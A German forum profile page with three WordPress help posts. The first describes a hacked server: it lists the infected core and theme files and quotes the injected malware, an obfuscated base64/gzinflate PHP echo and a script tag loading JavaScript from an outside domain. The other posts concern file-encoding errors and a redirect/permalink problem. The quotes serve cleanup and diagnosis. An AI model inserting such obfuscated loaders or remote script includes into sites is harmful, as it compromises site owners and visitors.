Beiträge von krischi

    Ja groß was eingefangen!!!

    Ging mir leider genauso... ich habe heute schätzungsweise 7-9h damit gebracht elendig viel Schadcode aus zugegebenermaßen recht vielen Seiten zu entfernen.

    Was es ist? Weiß ich leider auch noch nicht... habe erstmal alles entfernt bevor ich mit der Recherche anfange... daher bin ich jetzt hier gelandet.

    Aber das Script ist sicher nicht das Einzige!

    Es handelt sich ja um Wordpress... bitte mal an folgenden Orten prüfen:

    WP_root/index.php
    WP_root/wp-header.php
    WP_root/wp-login.php
    (und eine neue php Datei dürfte hier auch drin liegen. Name Variiert (session.php, q.php, p.php, phdinfo.php,favicon.php...) aber Änderungsdatum nur einige Sekunden neben den anderen hier genannten)

    WP_root/wp-admin/admin-footer.php
    WP_root/wp-admin/admin-header.php
    WP_root/wp-admin/custom-header.php
    WP_root/wp-admin/index.php
    WP_root/wp-admin/menu-header.php

    WP_root/network/wp-admin/index.php

    WP_root/wp-content/index.php

    WP_root/wp-content/plugins/index.php
    (gegebenenfalls auch einige Pluginordner betroffen, jeweils die index Dateien)
    WP_root/wp-content/themes/index.php

    WP_root/wp-content/themes/THEMEORDNER/index.php
    WP_root/wp-content/themes/THEMEORDNER/page.php
    WP_root/wp-content/themes/THEMEORDNER/header.php
    WP_root/wp-content/themes/THEMEORDNER/footer.php

    WP_root/wp-includes/theme-compat/header.php
    WP_root/wp-includes/theme-compat/footer.php

    so das sind jetzt alles Standarddateien der WP-Installationen. Je nach Plugins und Themes kann da noch mehr da zu kommen. Alle diese Dateien dürften ein Datum der letzten Änderung von gestern oder heute Nacht haben nehme ich an... jedenfalls liegt die Änderungszeit nur Sekunden auseinander.

    Und in alle Dateien wurde feinsäuberlich ein Schadcode eingeschrieben:

    Code
    #b58b6f#
    echo(gzinflate(base64_decode("JctRCoAgDADQq8gO4P5DvcuwRUmhbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3aRWPuDwjeTcmwKJeFK5Qc=")));
    #/b58b6f#

    (vielleicht variiert da auch der Inhalt)

    ja und je nach dem was noch so auf dem Server liegt sind wahrscheinlich alle Ordner betroffen. Also in jedem Falle mehrere Wordpressinstallationen aber ggf auch alle anderen php und html Dateien (meist irgendwas mit header, index, etc im Namen) In HTML Dateien wird übrigens direkt:

    Code
    <!--b58b6f--><script type="text/javascript" src="http://www.daysofyorr.com/release.js"></script><!--/b58b6f-->

    hineingeschrieben.

    So was das ganze macht?! Keine Ahnung, sicher nichts gutes s. Trojanerwarnung. Dsa Löschen der Codes ist sicher auch nicht das Ende vom Lied (ich Sitze auf meinem Webspace schon recht lange mit solchen Problemen... das kommt immer mal wieder in anderer Form)


    Vermutung: Das ganze hat sein Einfallstor in der thumb.php oder timthumb.php ich würde also stark vermuten, dass zumindest einer der Blogs auf dem Server ein Theme nutzt, welches timthumb integriert hat. Ihr könnt das ja bitte bestätigen oder widerlegen... die Ursache wüsste ich nämlich auch gern. Habe sie selbst noch nicht gefunden...

    Hallo! Habe da ein kleines Problem.

    Also ich habe WP schon x-mal installiert und nie Probleme gehabt... also ich weiß wie es geht ;)

    Jetzt folgendes Problem: Alles gemacht wie immer (hochladen, config.php eingerichtet) Beim ersten Aufrufen zur Installation gibt es dann Fehlermeldungen, dass es in irgendeiner Datei in Zeile XXX einen unexpected Tstring gibt oder ein ( expected wurde usw. Habs oft versucht und es sind scheinbar beliebige Dateien und beliebige Zeilen. Behebe ich ein Problem gibts gleich den Fehler irgendwo anders.

    Was vermute ich?! Irgendwie scheinen die betroffenen Dateien in AINSI codiert zu sein und nicht UTF8. Und an den ausgewiesenen Fehlerstellen steht tatsächlich Blödsinn sodass z.B statt "(" einfach "Åé" in der Datei steht.

    Nur was mache ich, damit das nicht vorkommt. Ich hab jetzt die verschiedensten WP versionen versucht und auch ein anderes FTP Programm genommen... Wo kommt das her!? Ich mache alles wie immer... jemand ne Idee??

    Besten Dank!!

    hallo leute... hab ein problem und kämpfe da schon den ganzen tag mit... jetzt muss ich die frage an euch abgeben... kriegs nicht hin

    muss leider etwas weiter ausholen:

    • wordpress in einen ordner auf meinem webspace installiert, funktioniert alles tadellos
    • ne domain bei united-domains geholt
    • weiterleitung zu meinem ordner eingerichtet (URL-HIDING (versteckte Weiterleitung) falls jemand es nicht kennt... dabei wird so getan als ob die domain ein echter server wäre... also xyz.de bleibt in der browserzeile funktionert aber ganz normal also im unterordner steht dann auch xyz.de/ordner/
    • blog funktioniert immer noch ;)

    so jetzt das problem:

    der blog über die ursprüngliche adresse (subdomain) läuft ganz normal... gehe ich zum blog über die neue domain funktioniert das auch (werde ja weitergeleitet) aber klicke ich dann auf einen link springt wieder die subdomain in die browserzeile (weil ja in WP alle links das alte blogverzeichnis nutzen) gebe ich aber xyz.de/irgendeinekategorie/ direkt ein erreiche ich auch die entsprechende stelle

    bevor jetzt die antwort kommt ich müsse das in den wp einstellungen verändern... hab ich natürlich versucht (also wp url und blog url)... solange ich die permalinks auf standard lasse geht auch alles... will ich aber sprechende urls à la %postname%.html gibts konflikte

    so ich fürchte mein problem ist immer noch nicht deutlich... weiß aber auch nicht wie ich es besser beschreiben soll... vielleicht ist jemandem ja das selbe schonmal passiert.... es liegt ja im wesentlichen an der speziellen weiterleitung "url hiding" von united domains


    also was mir direkt helfen könnte wäre, wenn ich irgendwie selbst die link basis in einer der wordpress dateien festlegen könnte (also damit bloginfo('url') aufruft was ich eingegeben habe) aber das müsste ich hinkriegen OHNE die siteurl oder home url in den wp-einstellungen zu verändern. was letztlich heißt dass nur das frontend von dieser änderung betroffen sein soll... und das backend normal die alten einstellungen benutzt damit alles funktioniert.

    denn der block läuft ganz normal über die subdomain und klicke ich auf nen link wird auch immer die subdomain als basis genutzt, aber würde die gewünschte adresse mit meiner domain statt der subdomain direkt eingeben komme ich auch zu ziel (nur dass wenn ich dort bin die links wieder die subdomain als linkbasis nutzen)

    ... hoffe ich habe nicht zu sehr verwirrt.... und ein dickes dankeschön an alle die mir helfen wollen...

    gruß christian